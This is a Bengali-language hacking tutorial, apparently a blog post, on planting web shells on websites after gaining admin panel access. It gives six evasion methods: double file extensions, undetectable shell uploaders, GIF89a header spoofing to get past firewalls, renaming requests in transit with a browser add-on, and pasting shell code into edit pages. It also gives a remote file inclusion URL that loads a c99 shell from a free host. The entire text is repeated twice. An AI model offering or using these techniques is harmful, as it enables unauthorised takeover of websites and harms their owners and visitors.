প্রথম এ বলে নেই এটি একটি NFN (Not For Noobs) টিউটোরিয়াল । এটি বুঝতে
হলে বেসিক হ্যাকিং জানা
অত্যাবশ্যক । আমরা
অনেক সময় ওয়েবসাইট এর অ্যাডমিন প্যানেল এ প্রবেশ করি এবং পি এইচ পি, এ এস পি ,
এ
এস পি এক্স ইত্যাদি শেল আপলোড এর চেস্টা করি । কিন্তু দেখা
যায় বিভিন্ন সমস্যা হয় । শেল আপলোড হয়না ... এন্টিভাইরাস ব্লক দেয়
ইত্যাদি
। অ্যাডমিন
প্যানেল এ লগিন করার পর
সহজেই আপলোড বাটন এর সাহায্যে শেল আপলোড দেয়া যায় । কিন্তু মাঝে মাঝে কিছু সমস্যা হতে পারে । তাই সহজ উপায়
এ শেল আপলোড না হলে কিভাভে তাকে
কাস্টোমাইজ
করে আপলোড করা যায় তাই আপনাদেরকে বলব ।
প্রথম পদ্ধতি
আমরা জানি বেশিরভাগ শেল থাকে .php বাঃ .asp ফরমেটে । অনেক সময় অনেক ওয়েবসাইট সে ফরমেট গুলো সাপোর্ট করে না । এর সবথেকে সহজ সমাধান হল সেগুলকে রিনেম করা । মানে নামের শেষ এ .php এর পরে .jpg , .png , .doc এসব বসিয়ে দেয়া । তাতে অনেক সময় কাজ হয়ে যায় ।
দ্বিতীয় পদ্ধতি
দ্বিতীয় পদ্ধতি হল শেল আপ্লোডার আপলোড করে শেল আপলোড করুন । এমন শেল আপ্লোডার আপলোড করুন যেটি এন্টিভাইরাস বাঃ ফায়ার ওয়াল দ্বারা সনাক্ত হবে না । এরকম আপ্লোডার আপনি নেটে খুজলেই পাবেন ।
তৃতীয় পদ্ধতি
কিছু ফায়াওয়াল যেমন comodo firewall , encripted security শেল এর হেডার চেক করে ও সেই শেল কে ব্লক করে দেয় । তাই এ থেকে বাচার উপায় হচ্ছে notepad এ এডিট করতে শেল টি খুলুন আমরা একে GIF89A SHELL SCRIPT দ্বারা এডিট করব । এর জন্য শেল এর স্ক্রিপ্ট শুরু হবার আগে GIF89a; অ্যাড করে দিন । এরপর সেভ করে নিন ।
চতুর্থ পদ্ধতি
আপনার ফায়ার ফক্স ব্রাউযার এ LIVE HTTP HEADERS অ্যাড ওয়ান টি ইন্সটাল করে নিন ।
> এখন আপনার পি এইচ পি শেল এর নামের শেষ এ .jpg বাঃ .png অ্যাড করে নিন । মানে সেই সাইট এ যে ফাইল ফরমেট সাপোর্ট করে আরকি ।
> এখন সেই সাইটে শেল শেল আপলোড করে আপনার অ্যাড অন টি খুলুন । সেই পেজেই
> তাহলে আপনার live http header নিচের ছবির মত দেখাবে ।
> এরপর রিপ্লাই বাটন এ ক্লিক করার পর shell.php.jpg তে ক্লিক করুন ।
> তাহলে দেখবেন নতুন উইন্ডো ওপেন হবে । সেখানে দুটি বক্স থাকবে । আমাদের কাজ ২ নাম্বার টিকে নিয়ে ।
> এরপর দুই নাম্বার বক্স এ .jpg তুলে দিয়ে shell. php নামে রিনেম করুন ।
দেখুন আমরা সার্ভার কে প্রথমে দেখালাম আমরা ছবি আপলোড করছি । সে তাই মেনে নিল । এরপর এই অ্যাড অন কে দিয়ে আমরা সেই পেজ এডিট করে আমাদের শেল ইঞ্জেক্ট করে দিলাম ।
পঞ্চম পদ্ধতি
উপরের চার টি পদ্ধতি কাজ করবে যখন আপনি আপলোড বাটন পাবেন । না পেলে ......... আপনাকে খুজতে হবে এডিট ইমেজ বাঃ এডিট আর্টিকেল নামে কিছু আছে কিনা । আপনাকে এটিও খেয়াল রাখতে হবে যে url এর শেষ এ .php ..asp এসব আছে কিনা । থাকলে সেই এডিট বাটনে ক্লিক করে সেখানে থাকা সবকিছু মুছে ফেলতে হবে । এরপর আপনার
শেল কে নোটপ্যাড এ খুলে সেখান থেকে সব কোড কপি করে পেস্ট করে দিতে হবে । কিন্তু অবশ্যই খেয়াল রাখবেন যে সেই পেযে যেন php কোড এডিট করার অপসন থাকে । সেটা না হলে আপনার শেল এর স্ক্রিপ্ট কাজ করবে না ।
ষষ্ঠ পদ্ধতি
RFI Vulnerable সাইটে সাধারনত অন্যান্য ফ্রী হোস্টিং সাইটের মাদ্ধমে শেল আপলোড করতে হয় । এর জন্য
> আপনার শেল কে যে কোনও ফ্রী হোস্টিং সাইট যেমন http://www.110mb.com, ইত্যাদি সাইট এ আপলোড করুন ।
> ধরুন আপনার লিঙ্ক হল http://www.example.110mb.com/c99.txt এবং আপনার vulnerable সাইট এর লিঙ্ক হল http://www.abc.com . তাহলে শেল কে সাইট এ বসাতে কম্যান্ড টি হবে ।
http://www.abc .com/v2/index.php?page=http://www.example.110mb.com/c99.txt
> আপনি আপনার শেল ও সাইট এর নাম এখানে বসাবেন । এটি উদাহরন দেয়া হল । কিন্তু সাইট RFI VULNERABLE না হলে এটি কাজ করবে না
Happy Hacking ..........
প্রথম পদ্ধতি
আমরা জানি বেশিরভাগ শেল থাকে .php বাঃ .asp ফরমেটে । অনেক সময় অনেক ওয়েবসাইট সে ফরমেট গুলো সাপোর্ট করে না । এর সবথেকে সহজ সমাধান হল সেগুলকে রিনেম করা । মানে নামের শেষ এ .php এর পরে .jpg , .png , .doc এসব বসিয়ে দেয়া । তাতে অনেক সময় কাজ হয়ে যায় ।
দ্বিতীয় পদ্ধতি
দ্বিতীয় পদ্ধতি হল শেল আপ্লোডার আপলোড করে শেল আপলোড করুন । এমন শেল আপ্লোডার আপলোড করুন যেটি এন্টিভাইরাস বাঃ ফায়ার ওয়াল দ্বারা সনাক্ত হবে না । এরকম আপ্লোডার আপনি নেটে খুজলেই পাবেন ।
তৃতীয় পদ্ধতি
কিছু ফায়াওয়াল যেমন comodo firewall , encripted security শেল এর হেডার চেক করে ও সেই শেল কে ব্লক করে দেয় । তাই এ থেকে বাচার উপায় হচ্ছে notepad এ এডিট করতে শেল টি খুলুন আমরা একে GIF89A SHELL SCRIPT দ্বারা এডিট করব । এর জন্য শেল এর স্ক্রিপ্ট শুরু হবার আগে GIF89a; অ্যাড করে দিন । এরপর সেভ করে নিন ।
চতুর্থ পদ্ধতি
আপনার ফায়ার ফক্স ব্রাউযার এ LIVE HTTP HEADERS অ্যাড ওয়ান টি ইন্সটাল করে নিন ।
> এখন আপনার পি এইচ পি শেল এর নামের শেষ এ .jpg বাঃ .png অ্যাড করে নিন । মানে সেই সাইট এ যে ফাইল ফরমেট সাপোর্ট করে আরকি ।
> এখন সেই সাইটে শেল শেল আপলোড করে আপনার অ্যাড অন টি খুলুন । সেই পেজেই
> তাহলে আপনার live http header নিচের ছবির মত দেখাবে ।
> এরপর রিপ্লাই বাটন এ ক্লিক করার পর shell.php.jpg তে ক্লিক করুন ।
> তাহলে দেখবেন নতুন উইন্ডো ওপেন হবে । সেখানে দুটি বক্স থাকবে । আমাদের কাজ ২ নাম্বার টিকে নিয়ে ।
> এরপর দুই নাম্বার বক্স এ .jpg তুলে দিয়ে shell. php নামে রিনেম করুন ।
দেখুন আমরা সার্ভার কে প্রথমে দেখালাম আমরা ছবি আপলোড করছি । সে তাই মেনে নিল । এরপর এই অ্যাড অন কে দিয়ে আমরা সেই পেজ এডিট করে আমাদের শেল ইঞ্জেক্ট করে দিলাম ।
পঞ্চম পদ্ধতি
উপরের চার টি পদ্ধতি কাজ করবে যখন আপনি আপলোড বাটন পাবেন । না পেলে ......... আপনাকে খুজতে হবে এডিট ইমেজ বাঃ এডিট আর্টিকেল নামে কিছু আছে কিনা । আপনাকে এটিও খেয়াল রাখতে হবে যে url এর শেষ এ .php ..asp এসব আছে কিনা । থাকলে সেই এডিট বাটনে ক্লিক করে সেখানে থাকা সবকিছু মুছে ফেলতে হবে । এরপর আপনার
শেল কে নোটপ্যাড এ খুলে সেখান থেকে সব কোড কপি করে পেস্ট করে দিতে হবে । কিন্তু অবশ্যই খেয়াল রাখবেন যে সেই পেযে যেন php কোড এডিট করার অপসন থাকে । সেটা না হলে আপনার শেল এর স্ক্রিপ্ট কাজ করবে না ।
ষষ্ঠ পদ্ধতি
RFI Vulnerable সাইটে সাধারনত অন্যান্য ফ্রী হোস্টিং সাইটের মাদ্ধমে শেল আপলোড করতে হয় । এর জন্য
> আপনার শেল কে যে কোনও ফ্রী হোস্টিং সাইট যেমন http://www.110mb.com, ইত্যাদি সাইট এ আপলোড করুন ।
> ধরুন আপনার লিঙ্ক হল http://www.example.110mb.com/c99.txt এবং আপনার vulnerable সাইট এর লিঙ্ক হল http://www.abc.com . তাহলে শেল কে সাইট এ বসাতে কম্যান্ড টি হবে ।
http://www.abc .com/v2/index.php?page=http://www.example.110mb.com/c99.txt
> আপনি আপনার শেল ও সাইট এর নাম এখানে বসাবেন । এটি উদাহরন দেয়া হল । কিন্তু সাইট RFI VULNERABLE না হলে এটি কাজ করবে না
Happy Hacking ..........